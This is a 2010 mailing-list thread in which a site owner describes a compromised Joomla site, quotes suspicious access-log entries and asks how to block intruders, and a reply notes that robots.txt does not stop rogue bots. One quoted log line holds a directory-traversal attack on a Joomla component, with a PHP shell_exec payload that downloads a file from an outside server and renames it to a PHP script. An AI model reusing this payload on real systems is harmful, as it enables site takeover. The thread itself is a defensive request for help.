[thelist] block phishing
James O'Donnell
jimmyropes at gmail.com
Sun Mar 28 11:49:29 CDT 2010
Robots.txt only work if the robot is a legitimate one that honors your
wishes.
A rogue will just go to whatever folder it wants to access regardless of
what rules are stated in robots.txt
-----Original Message-----
From: thelist-bounces at lists.evolt.org
[mailto:thelist-bounces at lists.evolt.org] On Behalf Of Bob Meetin
Sent: Sunday, 28 March, 2010 12:20
To: thelist at lists.evolt.org
Subject: [thelist] block phishing
I got a notice that one of my sites got hit yesterday, so I logged in,
and identified the file mentioned, also found a couple php files that
got dropped into webhome that were related. I moved the files into an
out of webroot folder for future scrutinization, then checked the server
access log, found a number of entries at the approximate date stamp of
the uploaded files that seemed to be related.
I am methodically going through the system looking for anything not
locked down. What I could use some help with is understanding if the
access log entries are associated and how to lock out the intruders. As
IP addresses change I suspect it's more than simply editing the
robots.txt or adding a line in the .htaccess. Some of the suspicious
entries look like:
123.125.66.72 - - [27/Mar/2010:18:58:09 -0500] "GET / HTTP/1.1" 200
18076 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
83.229.80.30 - - [27/Mar/2010:18:58:41 -0500] "POST /fat.php HTTP/1.1"
200 8015 "http://www.$websitename/fat.php" "Mozilla/5.0 (Windows; U;
Windows NT 6.0; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET
CLR 3.5.30729)"
fat.php was one of the deposited files. 18:58 was the datestamp.
75.125.130.100 - - [27/Mar/2010:22:25:47 -0500] "GET
/administrator/host.php HTTP/1.0" 200 73956 "-" "\"Mozilla/4.0"
Related? There is nothing (current) in the filesystem called host.php
80.246.53.20 - - [27/Mar/2010:22:25:41 -0500] "GET
/index.php?option=com_sectionex&controller=../../../../../../../../../../../
../../../../../../../../../../../../../proc/self/environ%00%0F
HTTP/1.1" 200 1423 "-" "<? shell_exec('lwp-download
http://immortal-killaz.servercamp.de/fanatix/tv.txt;mv tv.txt
print_out.php');?>"
com_sectionex is a Joomla component. There is also no legitimate file
called print_out.php but which I found.
75.125.130.100 - - [27/Mar/2010:22:25:48 -0500] "GET
/administrator/hr57.php HTTP/1.0" 200 73956 "-" "\"Mozilla/4.0"
Suggestions for robots.txt:
|#Baiduspider
User-agent: Baiduspider
Disallow: /
#Others
User-agent: *
Disallow: /
Suggestions for .htaccess:
||<Files *.*>
order allow,deny
allow from all
deny from 220.181.
</Files>
-Bob
|
--
* * Please support the community that supports you. * *
http://evolt.org/help_support_evolt/
For unsubscribe and other options, including the Tip Harvester
and archives of thelist go to: http://lists.evolt.org
Workers of the Web, evolt !
More information about the thelist
mailing list